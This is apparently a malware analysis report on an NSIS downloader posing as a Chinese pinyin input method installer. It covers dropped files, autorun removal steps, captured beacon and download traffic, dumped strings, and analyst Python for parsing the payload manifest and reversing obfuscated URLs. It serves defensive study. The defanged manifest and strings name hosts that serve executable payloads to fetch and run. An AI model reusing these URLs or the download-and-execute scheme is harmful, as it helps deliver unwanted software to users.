%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文之星双拼.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\蓝天双拼.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\我的短语.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\拼音加加双拼.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文符号.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\固顶字.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\双拼.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\智能ABC双拼.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS双拼.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\修复.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂ˫ƴ.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»Âë˫ƴ.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)

- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
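Most of the non-ASCII file names in the listing above are GBK (Simplified Chinese) names that the report rendered byte-for-byte as Latin-1, which is why they read like "Æ´Òô". The Python below is an added example and not part of the report: it reverses that rendering for names the page still carries intact (one Latin-1 character per original byte) and refuses names the page has damaged further, i.e. those containing a character outside Latin-1 (the "˫ƴ" sequences) or the "ÃÂ" / "â€" runs that mark a second UTF-8-as-Latin-1 pass. The sample names are copied from the listing; the double-encoding marker heuristic is this example's own assumption.

```python
"""Decode the GBK file names the dropped-file listing shows as Latin-1 mojibake."""

# Constructed test inputs: names copied verbatim from the listing above.
SAMPLE_NAMES = [
    "¿ìËÙÆ´ÒôÊäÈë·¨",   # Start Menu\Programs folder
    "Æ´Òô¼Ó¼Ó",         # prefix of one kusuInput\ini scheme file
    "Ö÷Ìâ",             # suffix of the theme folder name
    "ÖÇÄÜABC˫ƴ",       # contains a non-Latin-1 character: original bytes already lost
    "ÃÂÂÞ¸´",          # Start Menu .lnk name: encoded twice, not recoverable in one pass
]

# Heuristic (assumption): these runs are what UTF-8 bytes of an earlier
# mojibake look like when read as Latin-1 a second time.
DOUBLE_ENCODING_MARKERS = ("ÃÂ", "â€")


def decode_gbk_mojibake(name):
    """Return the intended GBK text, or None when the listing no longer carries
    the original bytes (non-Latin-1 character, double encoding, invalid GBK)."""
    if any(marker in name for marker in DOUBLE_ENCODING_MARKERS):
        return None
    try:
        raw = name.encode("latin-1")      # one Latin-1 char == one original byte
        text = raw.decode("gbk")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return None
    # A genuine decode re-encodes to exactly the bytes we started from.
    return text if text.encode("gbk") == raw else None


def decode_path(path):
    """Decode a Windows path component by component; pure-ASCII parts such as
    %Program Files%, 'ini' or the '.ini' extension pass through GBK unchanged.
    Returns None if any single component cannot be recovered."""
    parts = [decode_gbk_mojibake(part) for part in path.split("\\")]
    return None if any(part is None for part in parts) else "\\".join(parts)


if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        print(repr(name), "->", decode_gbk_mojibake(name))
    print(decode_path(r"%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨"))
```

Decoded, the Start Menu folder "¿ìËÙÆ´ÒôÊäÈë·¨" reads 快速拼音输入法 (Quick Pinyin Input Method), which fits the "KS"/"kusuInput" naming (kuai su = quick) and the ksime.ime input-method file dropped into %System%; the .ini names are the IME's shuangpin (双拼) scheme files. Names that come back as None have to be recovered from the sandbox file system itself, not from this page.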
Static Analysis
VersionInfo
Company Name:
Product Name: uscter
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: uscter setup
Internal Name: uscter setup
File Version:
File Description:
Comments:
Language: Chinese (Simplified, PRC)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23488 | 23552 | 4.48909 | 7ebfade271f75cb4c180603ab653af42 |
.rdata | 28672 | 4496 | 4608 | 3.59139 | 9d6e96915262c9d1129a16fa0b02a19a |
.data | 36864 | 110456 | 1024 | 3.27356 | dbf10679c897d0edeee280fffdad552f |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 34600 | 34816 | 3.26755 | 727c03c4b9eda9d853630881e7a4752c |

.ndata is the NSIS installer's uninitialised-data section: its raw size is 0, so the entropy is 0 and the section MD5 is just the MD5 of empty input (d41d8cd98f00b204e9800998ecf8427e). The large .data virtual size against a 1024-byte raw size is likewise normal for an NSIS stub, not a sign of in-section packing.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.google.uscter.hk.moyan.cc/db/apps.txt | 124.232.146.41 |
hxxp://srftj.xmzs8.com/tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 | 219.129.237.13 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: WINNET
Host: srftj.xmzs8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 11 Jan 2015 14:27:47 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17p1
2
ok
0

(Body decoded from chunked transfer-encoding: one 2-byte chunk containing "ok", then the terminating 0-length chunk.)
GET /db/apps.txt HTTP/1.0
Host: VVV.google.uscter.hk.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Length: 1457
Content-Type: text/plain
Last-Modified: Fri, 09 Jan 2015 13:26:20 GMT
Accept-Ranges: bytes
ETag: "0a6c1daf2cd01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sun, 11 Jan 2015 14:27:18 GMT
Connection: close
/*Setting*/
[ff1]
aa=OneDay
bb=OneDay.exe
cc=hXXp://124.232.152.119:18168/db/OneDay.zip
dd=
[ff2]
aa=lnk
bb=CreateShortcut.exe
cc=hXXp://124.232.152.119:18168/db/CreateShortcut.zip
dd=
[ff3]
aa=....
bb=ksimekusu_zhim_007.exe
cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip
dd=
[ff5000]
aa=uc
bb=Browser_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe
cc=hXXp://ly.jyfb.net/air/aicc/check.php?id=259
dd=
[ff11]
aa=mp
bb=-2203_1_mp.exe
cc=hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
dd=
[ff12]
aa=tqrl
bb=tqrl_93_2508.exe
cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip
dd=
[ff13]
aa=....
bb=weather_b_90045.exe
cc=hXXp://124.232.152.119:18168/db/weather_b_90045.zip
dd=
[ff14]
aa=aqi
bb=IQIYIsetup_qudao@kb007.exe
cc=hXXp://124.232.152.119:18168/db/IQIYIsetup_q

(In the two "aa=...." entries the dots stand for non-printable bytes in the capture; the response is cut off inside the last section, and the capture is shorter than the advertised Content-Length of 1457.)
<<< skipped >>>
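The apps.txt response above is the downloader's task list: each [ffN] section carries a component name (aa), the executable to run after extraction (bb) and the archive to fetch (cc); dd is always empty here. The Python parser below is an added example, not code from the report or from the sample. It turns a transcription of that response (constructed here from the capture, URLs left defanged) into the download tasks and the host:port indicators an analyst would block, and flags both the entry whose payload is not a .zip from the main host and the section that the capture cut off. Reading aa/bb/cc as name/file/URL is inferred from the values and from the file names seen elsewhere in this report, not stated by the sample.

```python
"""Parse the NSIS downloader's apps.txt manifest into download tasks and IOCs."""
import re
from urllib.parse import urlsplit

# Constructed sample: transcribed from the /db/apps.txt response captured
# above, URLs still defanged (hXXp) as in the report. The final [ff14]
# section stops exactly where the capture does.
SAMPLE_MANIFEST = """/*Setting*/
[ff1]
aa=OneDay
bb=OneDay.exe
cc=hXXp://124.232.152.119:18168/db/OneDay.zip
dd=
[ff2]
aa=lnk
bb=CreateShortcut.exe
cc=hXXp://124.232.152.119:18168/db/CreateShortcut.zip
dd=
[ff3]
aa=....
bb=ksimekusu_zhim_007.exe
cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip
dd=
[ff5000]
aa=uc
bb=Browser_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe
cc=hXXp://ly.jyfb.net/air/aicc/check.php?id=259
dd=
[ff11]
aa=mp
bb=-2203_1_mp.exe
cc=hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
dd=
[ff12]
aa=tqrl
bb=tqrl_93_2508.exe
cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip
dd=
[ff13]
aa=....
bb=weather_b_90045.exe
cc=hXXp://124.232.152.119:18168/db/weather_b_90045.zip
dd=
[ff14]
aa=aqi
bb=IQIYIsetup_qudao@kb007.exe
cc=hXXp://124.232.152.119:18168/db/IQIYIsetup_q"""

# Inferred meaning: aa = component name, bb = file to run, cc = download URL, dd unused.
REQUIRED_KEYS = ("aa", "bb", "cc", "dd")


def refang(url):
    """Turn the report's defanged hXXp:// back into http:// for parsing only."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def parse_manifest(text):
    """One dict per [section]; a task counts as complete only when all four
    keys were seen, so a section cut off by the capture is reported as such."""
    tasks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("/*"):
            continue                      # blank line or the /*Setting*/ banner
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            current = {"section": header.group(1)}
            tasks.append(current)
            continue
        if current is None or "=" not in line:
            continue                      # stray text before the first section
        key, _, value = line.partition("=")
        current[key.strip()] = value.strip()
    for task in tasks:
        task["complete"] = all(key in task for key in REQUIRED_KEYS)
    return tasks


def download_tasks(tasks):
    """(section, file to run, refanged URL) for every complete task."""
    return [(t["section"], t["bb"], refang(t["cc"])) for t in tasks if t["complete"]]


def network_iocs(tasks):
    """Sorted host[:port] values the downloader would contact."""
    return sorted({urlsplit(refang(t["cc"])).netloc for t in tasks if "cc" in t})


def unexpected_sources(tasks):
    """Complete tasks whose payload is not fetched as a .zip, i.e. the ones
    routed through a third-party 'check' endpoint instead of the main host."""
    return [t["section"] for t in tasks
            if t["complete"] and not refang(t["cc"]).lower().endswith(".zip")]


if __name__ == "__main__":
    tasks = parse_manifest(SAMPLE_MANIFEST)
    for section, exe, url in download_tasks(tasks):
        print(f"{section:8} {exe:60} {url}")
    print("hosts:", network_iocs(tasks))
    print("non-zip sources:", unexpected_sources(tasks))
    print("truncated:", [t["section"] for t in tasks if not t["complete"]])
```

The first three tasks name exactly the executables this report lists as child processes (OneDay.exe, CreateShortcut.exe, ksimekusu_zhim_007.exe), so the manifest, not the installer, decides what runs; blocking 124.232.152.119:18168 and ly.jyfb.net is the network-side control, and the manifest is fetched over plain HTTP with no integrity check visible in the capture.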
Map
The Malware connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_772:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
zhim_007.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
_mp.zip
07.zip
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
KERNEL32.DLL
comdlg32.dll
OLEAUT32.dll
oledlg.dll
SHLWAPI.dll
WININET.dll
WINSPOOL.DRV
RegEnumKeyW
.reloc
>~..hv
To%s1
('.Lu*s
%f
apps.txt
_007.exe"
2014.11.15.134232
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\uscter
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2203_1_mp.exe
007.exe
hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
007.zip
SR3#_`=*kiB.upG2
Nullsoft Install System v2.46
FFR.D9DD.CN
2.0.0.1
FreeFastRecovery.exe
KS1426.exe_2000:
.text
`.rdata
@.data
.rsrc
@.reloc
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyW
RegCreateKeyW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
DeleteUrlCacheEntryW
WININET.dll
URLDownloadToFileW
urlmon.dll
MSVCP100.dll
sqlite3_open
sqlite3_close
sqlite3_get_table
sqlite3_free
sqlite3_free_table
sqlite3_exec
sqlite3.dll
Library.dll
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
DirectUI.dll
MSVCR100.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GetProcessHeap
.?AVTable@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVDatabase@SQLite@@
0#0*00060
; ;$;(;,;0;4;8;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%USER%
ksinput.exe
config %d
config.exe
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
php.ijgnot/moc.8szmx.jtfrs//:ptth
%s?k=%s
select * from plugin where item=%d
n\plugin\plugin.db
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
%s%s%d.zip
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
php.gifnoc/moc.8szmx.afuruhs//:ptth
%s?v=3.0.3.9&t=1&x=%s&c=%d
20150111
3.0.3.9

Two of these strings are URLs stored reversed so that "http://" never appears in the binary: "php.ijgnot/moc.8szmx.jtfrs//:ptth" is hXXp://srftj.xmzs8.com/tongji.php, the beacon seen in the traffic above (sent with the "%s?k=%s" template and the WINNET User-Agent), and "php.gifnoc/moc.8szmx.afuruhs//:ptth" is hXXp://shurufa.xmzs8.com/config.php (used with "%s?v=3.0.3.9&t=1&x=%s&c=%d"), which is not among the URLs contacted during this run. Of the two "update plugin ..." statements, the first is malformed: it sets a column "ver" that the CREATE TABLE does not define and lacks the comma before "down="; the second is the corrected form. The plugin rows, and the "%s%s%d.zip" download name built from them, are how this component fetches further plugin archives (URLDownloadToFileW is imported for that), with the sqlite3.dll dropped alongside it providing the store.
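Two things in the KS1426.exe dump are worth turning into working checks: the URLs stored backwards (the strings ending in "//:ptth") and the SQL the component runs against plugin.db. The Python below is an added example and not code from the sample or from the report. It reverses the obfuscated strings, creates the plugin table from the CREATE TABLE string in the dump, and runs the dump's own INSERT/UPDATE/SELECT format strings against it with sample values, which demonstrates that SQLite rejects the first UPDATE string and accepts the second. The last function shows why building these statements with %-formatting matters; whether the name/path/down values really originate from the config.php response is an assumption the strings alone do not prove, so treat that part as a general point about the construction rather than a confirmed flaw in the sample.

```python
"""Turn two artefacts from the KS1426.exe strings dump into runnable checks:
reversed URLs and the embedded plugin.db SQL format strings."""
import sqlite3

# Constructed input: strings copied from the dump above, in dump order.
DUMP_STRINGS = [
    "php.ijgnot/moc.8szmx.jtfrs//:ptth",
    "%s?k=%s",
    "php.gifnoc/moc.8szmx.afuruhs//:ptth",
    "%s?v=3.0.3.9&t=1&x=%s&c=%d",
    "3.0.3.9",
]

# SQL format strings exactly as they appear in the dump.
CREATE_PLUGIN = ('CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, '
                 '"name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)')
INSERT_PLUGIN = ("insert into plugin(item,vers,name,path,file,down) "
                 "values(%d,%d,'%s','%s','%s','%s')")
UPDATE_BROKEN = ("update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' "
                 "where item=%d")
UPDATE_FIXED = ("update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' "
                "where item=%d")
SELECT_PLUGIN = "select * from plugin where item=%d"

# Sample plugin row (constructed; the file name is one dropped by the sample).
SAMPLE_ROW = ("ImeSkin", "plugin", "ImeSkin.dll", "skin")


def unreverse_urls(strings):
    """Recover URLs stored backwards; the tell-tale is the suffix '//:ptth'
    (or '//:sptth' for https), i.e. 'http://' reversed."""
    return [s[::-1] for s in strings if s.endswith(("//:ptth", "//:sptth"))]


def run_query(conn, template, args):
    """Build the statement the way the binary does (printf-style substitution)
    and run it; returns None on success or the SQLite error text."""
    try:
        conn.execute(template % args)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def check_plugin_queries():
    """Create the table from the dump's schema and exercise each statement."""
    conn = sqlite3.connect(":memory:")
    conn.execute(CREATE_PLUGIN)
    results = {
        "insert": run_query(conn, INSERT_PLUGIN, (1, 1) + SAMPLE_ROW),
        "update_broken": run_query(conn, UPDATE_BROKEN, (2,) + SAMPLE_ROW + (1,)),
        "update_fixed": run_query(conn, UPDATE_FIXED, (2,) + SAMPLE_ROW + (1,)),
    }
    results["row"] = conn.execute(SELECT_PLUGIN % 1).fetchone()
    conn.close()
    return results


def stored_name(name):
    """Insert the same name through the dump's %-formatted INSERT and through a
    parameterised one, and return what each actually stored. Assumption for the
    sake of the demonstration: the name value is attacker-influenced."""
    formatted, parameterised = sqlite3.connect(":memory:"), sqlite3.connect(":memory:")
    for conn in (formatted, parameterised):
        conn.execute(CREATE_PLUGIN)
    err = run_query(formatted, INSERT_PLUGIN, (1, 1, name, "p", "f", "d"))
    via_format = err or formatted.execute(SELECT_PLUGIN % 1).fetchone()[2]
    parameterised.execute(
        "insert into plugin(item,vers,name,path,file,down) values(?,?,?,?,?,?)",
        (1, 1, name, "p", "f", "d"))
    via_params = parameterised.execute(SELECT_PLUGIN % 1).fetchone()[2]
    return via_format, via_params


if __name__ == "__main__":
    print(unreverse_urls(DUMP_STRINGS))
    for key, value in check_plugin_queries().items():
        print(f"{key:14} {value}")
    print(stored_name("a'||'b"))
```

With a quote in the value, the %-formatted INSERT stores "ab" (the SQL expression 'a'||'b' was evaluated) while the parameterised INSERT stores the literal six characters; the broken UPDATE fails with a syntax error at "down", so whichever code path uses it never updates a row.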